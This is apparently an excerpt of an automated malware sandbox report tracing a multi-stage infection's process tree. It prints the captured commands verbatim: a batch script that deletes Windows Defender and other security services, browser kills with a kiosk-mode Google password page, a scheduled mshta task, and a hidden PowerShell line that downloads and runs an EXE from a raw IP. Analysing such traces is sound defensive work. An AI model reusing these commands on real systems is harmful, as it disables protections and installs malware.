        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5200
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5248
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5272
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:6068
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4244
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1968 -prefsLen 27099 -prefMapHandle 1972 -prefMapSize 270279 -ipcHandle 2060 -initialChannelId {de8b6ddc-95b5-46a8-b096-fc760dde0238} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:1636
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27135 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {827bfaaa-0d02-4b22-9c2e-c4b9f883d181} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:3584
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 25164 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {3c23f019-39a9-49df-9475-36e119f0726f} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:4544
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4036 -prefsLen 27276 -prefMapHandle 4040 -prefMapSize 270279 -ipcHandle 4156 -initialChannelId {e059b3bb-2c3b-4dae-be56-94fa86048a92} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:5620
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2744 -prefsLen 34775 -prefMapHandle 2784 -prefMapSize 270279 -jsInitHandle 2984 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2856 -initialChannelId {05f94360-d7f8-4b8b-a14d-656132c928fb} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:5176
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5160 -prefsLen 35012 -prefMapHandle 5164 -prefMapSize 270279 -ipcHandle 5124 -initialChannelId {9e409d45-2793-4cb6-8d0d-2fe6b28a356d} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:2132
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5620 -prefsLen 32952 -prefMapHandle 5624 -prefMapSize 270279 -jsInitHandle 5628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5636 -initialChannelId {d0b5d6ca-8ed5-4832-93ce-7908a9052fde} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:940
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5820 -prefsLen 32952 -prefMapHandle 5824 -prefMapSize 270279 -jsInitHandle 5828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5832 -initialChannelId {adf40d55-5e73-4f96-a6ca-38d19350acff} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6004 -prefsLen 32952 -prefMapHandle 6008 -prefMapSize 270279 -jsInitHandle 6012 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6020 -initialChannelId {fcbde187-bc8b-4a57-b272-38d53d7d0c86} -parentPid 4244 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4244" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:2320
      - C:\Users\Admin\AppData\Local\Temp\10478630101\8476304cbc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478630101\8476304cbc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A88.tmp\1A89.tmp\1A8A.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        8⤵
        
        PID:316
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BB1.tmp\1BB2.tmp\1BB3.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:3840
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3196
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:1528
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4124
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5752
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:1752
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:868
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:696
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5336
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1360
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4800
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2164
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2240
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5328
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1476
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:2488
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:3264
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:5264
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:3712
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3232
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:4636
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5880
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:1896
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1620
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1528
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:5240
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1972
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4388
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5308
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5200
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1848
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:936
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5228
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3148
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:208
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4268
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3672
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4156
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:3816
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:6040
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:5700
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:6080
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5532
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:3556
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2260
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:2280
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:384
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:4448
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5064
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4548
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:6032
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:4188
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:4884
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:316
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:368
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:1456
      - C:\Users\Admin\AppData\Local\Temp\10478640101\b538167fd6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478640101\b538167fd6.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\10478650101\ff19489656.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478650101\ff19489656.exe"
        6⤵
        Executes dropped EXE
        
        PID:752
      - C:\Users\Admin\AppData\Local\Temp\10478660101\7a4616a2d4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478660101\7a4616a2d4.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn zKKBumaDBba /tr "mshta C:\Users\Admin\AppData\Local\Temp\04Yw8seDS.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn zKKBumaDBba /tr "mshta C:\Users\Admin\AppData\Local\Temp\04Yw8seDS.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5588
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\04Yw8seDS.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
        
        "C:\Users\Admin\AppData\Local\TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5264
      - C:\Users\Admin\AppData\Local\Temp\10478670101\44e43277a9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478670101\44e43277a9.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6016
      - C:\Users\Admin\AppData\Local\Temp\10478680101\30c4aed2a1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478680101\30c4aed2a1.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478680101\30c4aed2a1.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4512
      - C:\Users\Admin\AppData\Local\Temp\10478690101\12ca9c48e4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478690101\12ca9c48e4.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478690101\12ca9c48e4.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5328
      - C:\Users\Admin\AppData\Local\Temp\10478700101\YMauSAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478700101\YMauSAr.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:4184
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        7⤵
        Executes dropped EXE
        
        PID:2036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        9⤵
        Executes dropped EXE
        
        PID:4760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        11⤵
        Executes dropped EXE
        
        PID:5236
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        Executes dropped EXE
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        16⤵
        Executes dropped EXE
        
        PID:6032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        17⤵
        Executes dropped EXE
        
        PID:508
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        18⤵
        Executes dropped EXE
        
        PID:2464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        21⤵
        Executes dropped EXE
        
        PID:4648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        22⤵
        Executes dropped EXE
        
        PID:2036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        23⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        24⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        25⤵
        Executes dropped EXE
        
        PID:1028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        26⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        27⤵
        Executes dropped EXE
        
        PID:1224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        28⤵
        Executes dropped EXE
        
        PID:5956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        29⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3916
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        30⤵
        Executes dropped EXE
        
        PID:3840
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        31⤵
        Executes dropped EXE
        
        PID:3372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        32⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2236
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        33⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        34⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5576
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        35⤵
        Executes dropped EXE
        
        PID:4172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        36⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        37⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2328
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        38⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2704
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        39⤵
        Executes dropped EXE
        
        PID:2688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        40⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3292
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        41⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        42⤵
        
        PID:1440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        43⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:1296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        46⤵
        System Location Discovery: System Language Discovery
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:1360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        48⤵
        System Location Discovery: System Language Discovery
        
        PID:4964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        49⤵
        
